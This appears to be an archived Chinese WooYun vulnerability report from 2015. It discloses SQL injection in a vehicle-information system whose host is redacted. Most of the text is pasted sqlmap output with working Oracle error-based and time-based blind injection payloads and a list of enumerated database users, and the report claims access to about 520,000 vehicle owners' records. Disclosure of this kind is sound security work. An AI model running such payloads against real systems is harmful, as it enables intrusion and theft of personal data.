乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-06: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
sql注入,泄露大量信息
0x01:**.**.**.**:9080/zdcl/zdclwai.do?type=jdcwfts&yhdh=3066BVXW (GET)存在注入,并可以获取用户密码
sqlmap resumed the following injection point(s) from stored session:---Parameter: yhdh (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: type=jdcwfts&yhdh=3066BVXW' AND 8911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8911=8911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'rpmY'='rpmY Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: type=jdcwfts&yhdh=3066BVXW' OR 4382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(90)||CHR(112)||CHR(75),5) AND 'bEMX'='bEMX---back-end DBMS: Oraclesqlmap resumed the following injection point(s) from stored session:---Parameter: yhdh (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: type=jdcwfts&yhdh=3066BVXW' AND 8911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8911=8911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'rpmY'='rpmY Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: type=jdcwfts&yhdh=3066BVXW' OR 4382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(90)||CHR(112)||CHR(75),5) AND 'bEMX'='bEMX---back-end DBMS: Oracledatabase management system users [30]:[*] ANONYMOUS[*] BI[*] CTXSYS[*] CX_DXGZ[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] HR[*] IX[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OE[*] OLAPSYS[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] PM[*] QDLP_USER[*] SCOTT[*] SH[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] ZDCL_USER
0x02:登陆账号,泄露52w车主信息,并包含大量的警用车辆信息
0x03:特种车辆信息
过滤参数,后台不要对外!
危害等级:中
漏洞Rank:6
确认时间:2015-10-10 10:39
感谢提交!!验证确认所描述的问题,已通知其修复。
暂无